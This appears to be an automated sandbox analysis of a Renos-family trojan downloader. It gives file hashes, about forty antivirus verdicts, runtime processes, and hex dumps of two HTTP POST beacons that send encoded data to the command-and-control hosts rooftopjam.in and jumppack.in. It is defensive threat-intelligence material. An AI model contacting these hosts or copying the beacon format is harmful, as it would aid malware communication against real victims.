Analysis Date: 2018-05-04 22:18:02
MD5: a9bb5d77d36aabee33f2416bda8fbcaa
SHA1: d6ed297ac7c77f1f0ea06b3e00c55d1c155eb731

Static Details:

File type: PE32 executable (GUI) Intel 80386, for MS Windows
PEhash: (not recorded)
AV Arcabit (arcavir): Gen:Variant.Renos.96
AV Authentium: W32/FakeAlert.NZ.gen!Eldorado
AV Grisoft (avg): Generic23.CLJK
AV Avira (antivir): TR/Jorik.Skor.B.2
AV Alwil (avast): MalOb-GP [Cryp]
AV Ad-Aware: Gen:Variant.Renos.96
AV BitDefender: Gen:Variant.Renos.96
AV BullGuard: Gen:Variant.Renos.96
AV ClamAV: Win.Downloader.112898-1
AV Dr. Web: Trojan.DownLoader3.30368
AV Emsisoft: Gen:Variant.Renos.96
AV MicroWorld (escan): Gen:Variant.Renos.96
AV CA (E-Trust Ino): Gen:Variant.Renos.96
AV Fortinet: W32/Delf.AT!tr
AV Frisk (f-prot): W32/FakeAlert.NZ.gen!Eldorado
AV F-Secure: Gen:Variant.Renos.96
AV Ikarus: Trojan-Downloader.Win32.Renos
AV K7: Trojan ( 002a35bc1 )
AV Kaspersky: Trojan-Downloader.Win32.CodecPack.sjt
AV MalwareBytes: No Virus
AV Mcafee: Downloader-CEW.bi
AV Microsoft Security Essentials: TrojanDownloader:Win32/Renos
AV NANO: Error Scanning File
AV Eset (nod32): Win32/TrojanDownloader.FakeAlert.BBT
AV Padvish: Malware.Trojan.Downloader-112898
AV CAT (quickheal): Trojan.Renos.PG
AV Rising: Trojan.DL.Win32.DelfCode.gjc
AV 360 Safe: No Virus
AV SUPERAntiSpyware: Trojan.Agent/Gen-FakeAlert
AV Symantec: VirusDoctor!gen6
AV Trend Micro: TROJ_ARTO.SMIA
AV Twister: Trojan.730C031500@120089.mg
AV VirusBlokAda (vba32): TScope.Malware-Cryptor.SB
AV Windows Defender: TrojanDownloader:Win32/Renos
AV Zillya!: Error Scanning File

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\d6ed297ac7c77f1f0ea06b3e00c55d1c155eb731.exe

Network Details:


Raw Pcap
0x00000000 (00000)   504f5354 202f3f69 6e693d76 32324d7a   POST /?ini=v22Mz
0x00000010 (00016)   7a546754 39543157 57426776 41515446   zTgT9T1WWBgvAQTF
0x00000020 (00032)   72467450 75572f4a 5941384d 34316554   rFtPuW/JYA8M41eT
0x00000030 (00048)   434e394c 6b685857 464f4969 78485a7a   CN9LkhXWFOIixHZz
0x00000040 (00064)   6d716b56 31724849 51714d67 4d715637   mqkV1rHIQqMgMqV7
0x00000050 (00080)   4a684e4b 6769424d 46346341 486a7a66   JhNKgiBMF4cAHjzf
0x00000060 (00096)   6f325274 75665170 4b582f4e 2f747376   o2RtufQpKX/N/tsv
0x00000070 (00112)   7537726b 413d3d20 48545450 2f312e31   u7rkA== HTTP/1.1
0x00000080 (00128)   0d0a436f 6e74656e 742d5479 70653a20   ..Content-Type: 
0x00000090 (00144)   6170706c 69636174 696f6e2f 782d7777   application/x-ww
0x000000a0 (00160)   772d666f 726d2d75 726c656e 636f6465   w-form-urlencode
0x000000b0 (00176)   640d0a48 6f73743a 20726f6f 66746f70   d..Host: rooftop
0x000000c0 (00192)   6a616d2e 696e0d0a 55736572 2d416765   jam.in..User-Age
0x000000d0 (00208)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000e0 (00224)   2857696e 646f7773 204e5420 362e313b   (Windows NT 6.1;
0x000000f0 (00240)   20776765 7420332e 303b2072 763a352e    wget 3.0; rv:5.
0x00000100 (00256)   30292047 65636b6f 2f323031 30303130   0) Gecko/2010010
0x00000110 (00272)   31204669 7265666f 782f352e 300d0a43   1 Firefox/5.0..C
0x00000120 (00288)   6f6e7465 6e742d4c 656e6774 683a2031   ontent-Length: 1
0x00000130 (00304)   35370d0a 436f6e6e 65637469 6f6e3a20   57..Connection: 
0x00000140 (00320)   636c6f73 650d0a43 61636865 2d436f6e   close..Cache-Con
0x00000150 (00336)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000160 (00352)   0d0a6461 74613d71 5372547a 474c3052   ..data=qSrTzGL0R
0x00000170 (00368)   4d437944 6e59392b 784a4551 65356e4e   MCyDnY9+xJEQe5nN
0x00000180 (00384)   4c756e64 734d7166 64674247 7a556f4a   LundsMqfdgBGzUoJ
0x00000190 (00400)   30785654 552f447a 51574333 444c6258   0xVTU/DzQWC3DLbX
0x000001a0 (00416)   422f5566 45545431 6f364632 5a49624c   B/UfETT1o6F2ZIbL
0x000001b0 (00432)   4547564a 304e6856 5454374c 386e5936   EGVJ0NhVTT7L8nY6
0x000001c0 (00448)   4c50426f 722f2b4d 75682b2f 36323233   LPBor/+Muh+/6223
0x000001d0 (00464)   54583351 526d7755 72677073 50393669   TX3QRmwUrgpsP96i
0x000001e0 (00480)   704e725a 504d7851 38725a44 46476657   pNrZPMxQ8rZDFGfW
0x000001f0 (00496)   61547655 346e574f 6a344577 6a303d     aTvU4nWOj4Ewj0=

0x00000000 (00000)   504f5354 202f3f69 6e693d76 32324d7a   POST /?ini=v22Mz
0x00000010 (00016)   7a546754 39543157 57426776 41515446   zTgT9T1WWBgvAQTF
0x00000020 (00032)   72467450 75572f4a 5941384d 34316554   rFtPuW/JYA8M41eT
0x00000030 (00048)   434e394c 6b685857 464f4969 78485a7a   CN9LkhXWFOIixHZz
0x00000040 (00064)   6d716b56 31724849 51714d67 4d715637   mqkV1rHIQqMgMqV7
0x00000050 (00080)   4a684e4b 6769424d 46346341 486a7a66   JhNKgiBMF4cAHjzf
0x00000060 (00096)   6f325274 75665170 4b582f4e 2f747376   o2RtufQpKX/N/tsv
0x00000070 (00112)   7537726b 413d3d20 48545450 2f312e31   u7rkA== HTTP/1.1
0x00000080 (00128)   0d0a436f 6e74656e 742d5479 70653a20   ..Content-Type: 
0x00000090 (00144)   6170706c 69636174 696f6e2f 782d7777   application/x-ww
0x000000a0 (00160)   772d666f 726d2d75 726c656e 636f6465   w-form-urlencode
0x000000b0 (00176)   640d0a48 6f73743a 206a756d 70706163   d..Host: jumppac
0x000000c0 (00192)   6b2e696e 0d0a5573 65722d41 67656e74   k.in..User-Agent
0x000000d0 (00208)   3a204d6f 7a696c6c 612f352e 30202857   : Mozilla/5.0 (W
0x000000e0 (00224)   696e646f 7773204e 5420362e 313b2077   indows NT 6.1; w
0x000000f0 (00240)   67657420 332e303b 2072763a 352e3029   get 3.0; rv:5.0)
0x00000100 (00256)   20476563 6b6f2f32 30313030 31303120    Gecko/20100101 
0x00000110 (00272)   46697265 666f782f 352e300d 0a436f6e   Firefox/5.0..Con
0x00000120 (00288)   74656e74 2d4c656e 6774683a 20313537   tent-Length: 157
0x00000130 (00304)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000140 (00320)   6f73650d 0a436163 68652d43 6f6e7472   ose..Cache-Contr
0x00000150 (00336)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000160 (00352)   64617461 3d715372 547a474c 30524d43   data=qSrTzGL0RMC
0x00000170 (00368)   79446e59 392b784a 45516535 6e4e4c75   yDnY9+xJEQe5nNLu
0x00000180 (00384)   6e64734d 71666467 42477a55 6f4a3078   ndsMqfdgBGzUoJ0x
0x00000190 (00400)   5654552f 447a5157 4333444c 6258422f   VTU/DzQWC3DLbXB/
0x000001a0 (00416)   55664554 54316f36 46325a49 624c4547   UfETT1o6F2ZIbLEG
0x000001b0 (00432)   564a304e 68565454 374c386e 59364c50   VJ0NhVTT7L8nY6LP
0x000001c0 (00448)   426f722f 2b4d7568 2b2f3632 32335458   Bor/+Muh+/6223TX
0x000001d0 (00464)   3351526d 77557267 70735039 3669704e   3QRmwUrgpsP96ipN
0x000001e0 (00480)   725a504d 78513872 5a444647 66576154   rZPMxQ8rZDFGfWaT
0x000001f0 (00496)   7655346e 574f6a34 45776a30 3d303d     vU4nWOj4Ewj0=0=


Strings